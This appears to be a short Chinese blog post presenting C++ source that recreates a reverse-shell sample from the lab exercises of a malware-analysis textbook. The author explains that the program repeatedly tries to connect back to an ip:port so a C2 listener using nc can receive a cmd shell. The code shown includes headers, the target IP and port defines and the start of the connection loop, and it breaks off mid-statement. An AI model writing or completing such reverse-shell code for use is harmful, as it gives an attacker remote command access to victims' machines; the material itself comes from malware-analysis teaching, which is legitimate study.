这段代码比我还老了,哈哈~
功能很简单,就是一直尝试向某个ip:port反弹shell,C2用nc就能接收这个反弹shell。
// RedirectCmd.cpp : Defines the entry point for the console application.
// 还原《恶意代码分析实战》第九章练习样本2
#include "stdafx.h"
#include <WinSock2.h>
#include <Windows.h>
#pragma comment(lib,"ws2_32")
#define DELAYMILLSECOND 3000
#define REMOTE_PORT 9999
#define REMOTE_IP "localhost"
#define CMD_STR "cmd"
int _tmain(int argc, _TCHAR* argv[])
{
while (1)
{
WSAData WsaData;
if (0 != WSAStartup